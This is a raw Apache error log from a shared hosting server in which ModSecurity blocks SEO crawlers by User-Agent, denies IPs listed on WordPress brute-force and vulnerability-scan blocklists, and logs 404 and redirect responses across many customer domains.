[Tue May 26 16:47:33.429874 2026] [security2:error] [pid 823496:tid 823726] [client 5.39.1.254:38734] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "besglam.com"] [uri "/robots.txt"] [unique_id "ahWBTZa08mrtyBNpA4PXSAAAAGI"]
[Tue May 26 16:47:33.430011 2026] [security2:error] [pid 823496:tid 823726] [client 5.39.1.254:38734] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "besglam.com"] [uri "/robots.txt"] [unique_id "ahWBTZa08mrtyBNpA4PXSAAAAGI"]
[Tue May 26 16:47:33.710405 2026] [security2:error] [pid 823496:tid 823659] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBS5a08mrtyBNpA4PXOAAAAB8"]
[Tue May 26 16:47:34.571374 2026] [security2:error] [pid 817651:tid 817819] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBTdlGRCPPN1dS2y24ugAAAKs"]
[Tue May 26 16:47:34.773749 2026] [security2:error] [pid 817651:tid 817864] [client 54.39.0.110:58850] ModSecurity: Access denied with code 406 (phase 1). Pattern match "Mozilla\\\\/5\\\\.0 \\\\(compatible; AhrefsBot\\\\/\\\\d\\\\.\\\\d; \\\\+http:\\\\/\\\\/ahrefs\\\\.com\\\\/robot\\\\/\\\\)" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "578"] [id "900165"] [msg "AhrefsBot BOT Request"] [hostname "besglam.com"] [uri "/"] [unique_id "ahWBTtlGRCPPN1dS2y24xgAAANg"]
[Tue May 26 16:47:34.773837 2026] [security2:error] [pid 817651:tid 817864] [client 54.39.0.110:58850] ModSecurity: Warning. Matched phrase "AhrefsBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "besglam.com"] [uri "/"] [unique_id "ahWBTtlGRCPPN1dS2y24xgAAANg"]
[Tue May 26 16:47:36.820223 2026] [security2:error] [pid 817651:tid 817814] [client 117.198.37.168:64872] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBUNlGRCPPN1dS2y240gAAAKY"]
[Tue May 26 16:47:36.820356 2026] [security2:error] [pid 817651:tid 817814] [client 117.198.37.168:64872] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBUNlGRCPPN1dS2y240gAAAKY"]
[Tue May 26 16:47:36.889766 2026] [security2:error] [pid 823496:tid 823748] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBT5a08mrtyBNpA4PXXQAAAHg"]
[Tue May 26 16:47:36.921967 2026] [security2:error] [pid 817651:tid 817865] [client 143.110.209.223:54172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.209.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-2019.php"] [unique_id "ahWBUNlGRCPPN1dS2y240wAAANk"]
[Tue May 26 16:47:36.922074 2026] [security2:error] [pid 817651:tid 817865] [client 143.110.209.223:54172] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "christinaspromotions.com"] [uri "/wp-2019.php"] [unique_id "ahWBUNlGRCPPN1dS2y240wAAANk"]
[Tue May 26 16:47:38.349825 2026] [security2:error] [pid 823496:tid 823730] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBUZa08mrtyBNpA4PXbgAAAGY"]
[Tue May 26 16:47:39.427455 2026] [security2:error] [pid 823496:tid 823661] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBUpa08mrtyBNpA4PXgQAAACE"]
[Tue May 26 16:47:39.922768 2026] [security2:error] [pid 823496:tid 823747] [client 143.110.209.223:54342] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 223.209.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/atomlib.php"] [unique_id "ahWBU5a08mrtyBNpA4PXjwAAAHc"]
[Tue May 26 16:47:39.922890 2026] [security2:error] [pid 823496:tid 823747] [client 143.110.209.223:54342] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "christinaspromotions.com"] [uri "/atomlib.php"] [unique_id "ahWBU5a08mrtyBNpA4PXjwAAAHc"]
[Tue May 26 16:47:41.860419 2026] [security2:error] [pid 817651:tid 817904] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBVdlGRCPPN1dS2y247wAAAQA"]
[Tue May 26 16:47:42.695472 2026] [security2:error] [pid 823496:tid 823533] [remote 47.128.127.85:20714] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "staging.unsobered.com"] [uri "/feature-post/bacardi-india-introduces-good-man-its-first-india-made-brandy/"] [unique_id "ahWBVpa08mrtyBNpA4PXwAAAJyI"]
[Tue May 26 16:47:43.332008 2026] [security2:error] [pid 823496:tid 823697] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBVpa08mrtyBNpA4PXxQAAAEU"]
[Tue May 26 16:47:44.241682 2026] [security2:error] [pid 823496:tid 823675] [client 68.234.41.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWBWJa08mrtyBNpA4PX2AAAAC8"], referer: https://www.anujtradingco.com/
[Tue May 26 16:47:45.782066 2026] [security2:error] [pid 817651:tid 817886] [client 68.234.41.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWBWdlGRCPPN1dS2y25EgAAAO4"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1472905&moderation-hash=bd717edadc87b53ec06e0f941e561bcc
[Tue May 26 16:47:45.886611 2026] [security2:error] [pid 823496:tid 823742] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBWZa08mrtyBNpA4PX4wAAAHI"]
[Tue May 26 16:47:47.099559 2026] [security2:error] [pid 823496:tid 823688] [client 117.198.37.168:65190] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBW5a08mrtyBNpA4PYHwAAADw"]
[Tue May 26 16:47:47.099697 2026] [security2:error] [pid 823496:tid 823688] [client 117.198.37.168:65190] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBW5a08mrtyBNpA4PYHwAAADw"]
[Tue May 26 16:47:47.748436 2026] [security2:error] [pid 823496:tid 823729] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBW5a08mrtyBNpA4PYHQAAAGU"]
[Tue May 26 16:47:47.831156 2026] [lsapi:error] [pid 823496:tid 823681] [client 195.178.110.105:50828] [host jetstarprojects.com] Request retrieving failed. Reason: unknown, On: request body, Source: client, Where: unknown
[Tue May 26 16:47:47.831182 2026] [lsapi:error] [pid 823496:tid 823681] [client 195.178.110.105:50828] [host jetstarprojects.com] In order to get more info about fail reason try to change LogLevel to Info in httpd.conf and restart Apache
[Tue May 26 16:47:47.831191 2026] [lsapi:error] [pid 823496:tid 823681] [client 195.178.110.105:50828] [host jetstarprojects.com] Client error on sending request(POST / HTTP/1.1); uri(/) content-length(131872): user_get_body(tmpstackbuf, 16384): read from client failed
[Tue May 26 16:47:50.108006 2026] [security2:error] [pid 823496:tid 823689] [client 185.191.171.19:35908] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-17-21/list/"] [unique_id "ahWBXpa08mrtyBNpA4PYUQAAAD0"]
[Tue May 26 16:47:50.108123 2026] [security2:error] [pid 823496:tid 823689] [client 185.191.171.19:35908] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-17-21/list/"] [unique_id "ahWBXpa08mrtyBNpA4PYUQAAAD0"]
[Tue May 26 16:47:50.205824 2026] [security2:error] [pid 823496:tid 823709] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBXZa08mrtyBNpA4PYSQAAAFE"]
[Tue May 26 16:47:50.264416 2026] [security2:error] [pid 817651:tid 817784] [client 68.234.41.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWBXtlGRCPPN1dS2y25NAAAAIg"], referer: https://anujtradingco.com
[Tue May 26 16:47:51.562706 2026] [security2:error] [pid 823496:tid 823508] [remote 141.95.202.18:49608] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWBX5a08mrtyBNpA4PYZgAAdAk"]
[Tue May 26 16:47:51.711953 2026] [security2:error] [pid 823496:tid 823750] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBX5a08mrtyBNpA4PYXwAAAHo"]
[Tue May 26 16:47:52.430261 2026] [security2:error] [pid 823496:tid 823649] [client 114.119.144.42:46683] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.ucdc.co.in"] [uri "/upload/omr/520190869.pdf"] [unique_id "ahWBYJa08mrtyBNpA4PYeAAAABU"], referer: https://www.ucdc.co.in/upload/omr
[Tue May 26 16:47:53.291936 2026] [security2:error] [pid 823496:tid 823714] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBYJa08mrtyBNpA4PYdwAAAFY"]
[Tue May 26 16:47:55.694856 2026] [security2:error] [pid 817651:tid 817813] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBYtlGRCPPN1dS2y25WQAAAKU"]
[Tue May 26 16:47:55.995611 2026] [security2:error] [pid 817651:tid 817805] [client 185.100.87.174:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "jkjuice.com"] [uri "/index.php"] [unique_id "ahWBY9lGRCPPN1dS2y25YgAAAJ0"]
[Tue May 26 16:47:56.960728 2026] [security2:error] [pid 823496:tid 823736] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBZJa08mrtyBNpA4PYnQAAAGw"]
[Tue May 26 16:47:57.202238 2026] [security2:error] [pid 823496:tid 823682] [client 198.98.56.118:65209] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.56.98.198.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "koneksi.com.co"] [uri "/wp-login.php"] [unique_id "ahWBZJa08mrtyBNpA4PYpAAAADY"]
[Tue May 26 16:47:57.774059 2026] [security2:error] [pid 823496:tid 823634] [client 117.198.37.168:65511] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBZZa08mrtyBNpA4PYrgAAAAY"]
[Tue May 26 16:47:57.774246 2026] [security2:error] [pid 823496:tid 823634] [client 117.198.37.168:65511] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBZZa08mrtyBNpA4PYrgAAAAY"]
[Tue May 26 16:47:59.504124 2026] [security2:error] [pid 823496:tid 823670] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBZpa08mrtyBNpA4PYxAAAACo"]
[Tue May 26 16:47:59.946016 2026] [security2:error] [pid 823496:tid 823733] [client 146.174.170.185:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBZ5a08mrtyBNpA4PYzAAAAGk"]
[Tue May 26 16:48:02.125080 2026] [security2:error] [pid 823496:tid 823643] [client 172.98.32.183:60731] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 183.32.98.172.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWBaZa08mrtyBNpA4PY-gAAAA8"]
[Tue May 26 16:48:02.202634 2026] [security2:error] [pid 823496:tid 823711] [client 45.132.227.137:50211] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 137.227.132.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahWBaZa08mrtyBNpA4PY-wAAAFM"]
[Tue May 26 16:48:02.223773 2026] [security2:error] [pid 823496:tid 823740] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBaZa08mrtyBNpA4PY7gAAAHA"]
[Tue May 26 16:48:02.412297 2026] [security2:error] [pid 817651:tid 817655] [remote 168.63.79.147:35116] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.79.63.168.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahWBatlGRCPPN1dS2y25jAAAuQM"]
[Tue May 26 16:48:03.959290 2026] [security2:error] [pid 823496:tid 823720] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBa5a08mrtyBNpA4PZDAAAAFw"]
[Tue May 26 16:48:05.442349 2026] [security2:error] [pid 823496:tid 823739] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBbJa08mrtyBNpA4PZIgAAAG8"]
[Tue May 26 16:48:07.329149 2026] [security2:error] [pid 823496:tid 823674] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBbpa08mrtyBNpA4PZNwAAAC4"]
[Tue May 26 16:48:07.894892 2026] [security2:error] [pid 823496:tid 823713] [client 117.198.37.168:49445] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBb5a08mrtyBNpA4PZSwAAAFU"]
[Tue May 26 16:48:07.895021 2026] [security2:error] [pid 823496:tid 823713] [client 117.198.37.168:49445] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBb5a08mrtyBNpA4PZSwAAAFU"]
[Tue May 26 16:48:09.279714 2026] [security2:error] [pid 823496:tid 823649] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBcJa08mrtyBNpA4PZXQAAABU"]
[Tue May 26 16:48:10.789425 2026] [security2:error] [pid 823496:tid 823628] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBcZa08mrtyBNpA4PZbwAAAAA"]
[Tue May 26 16:48:10.851160 2026] [security2:error] [pid 817651:tid 817854] [client 74.7.244.36:40104] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.deeigo.com"] [uri "/public/index.php"] [unique_id "ahWBctlGRCPPN1dS2y25uQAAzmU"]
[Tue May 26 16:48:10.851192 2026] [security2:error] [pid 817651:tid 817854] [client 74.7.244.36:40104] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.deeigo.com"] [uri "/public/index.php"] [unique_id "ahWBctlGRCPPN1dS2y25uQAAzmU"]
[Tue May 26 16:48:12.727340 2026] [security2:error] [pid 823496:tid 823657] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBc5a08mrtyBNpA4PZigAAAB0"]
[Tue May 26 16:48:14.795965 2026] [security2:error] [pid 823496:tid 823741] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBdpa08mrtyBNpA4PZqAAAAHE"]
[Tue May 26 16:48:17.845725 2026] [security2:error] [pid 823496:tid 823674] [client 168.119.123.75:63552] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWBeZa08mrtyBNpA4PZ8wAAAC4"], referer: http://ucdc.co.in/
[Tue May 26 16:48:18.346600 2026] [security2:error] [pid 823496:tid 823733] [client 117.198.37.168:49771] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 168.37.198.117.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBepa08mrtyBNpA4PZ-QAAAGk"]
[Tue May 26 16:48:18.346744 2026] [security2:error] [pid 823496:tid 823733] [client 117.198.37.168:49771] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "shahvishaal.com"] [uri "/xmlrpc.php"] [unique_id "ahWBepa08mrtyBNpA4PZ-QAAAGk"]
[Tue May 26 16:48:18.659750 2026] [security2:error] [pid 823496:tid 823679] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWBeJa08mrtyBNpA4PZ1QAAADM"]
[Tue May 26 16:48:19.087782 2026] [security2:error] [pid 823496:tid 823693] [client 20.17.176.186:63930] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "paqys.com"] [uri "/index.php"] [unique_id "ahWBepa08mrtyBNpA4PZ-gAAAEE"], referer: binance.com
[Tue May 26 16:48:19.130836 2026] [security2:error] [pid 817651:tid 817896] [client 114.119.148.34:36537] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "agsnails.com"] [uri "/robots.txt"] [unique_id "ahWBe9lGRCPPN1dS2y257QAAAPg"]
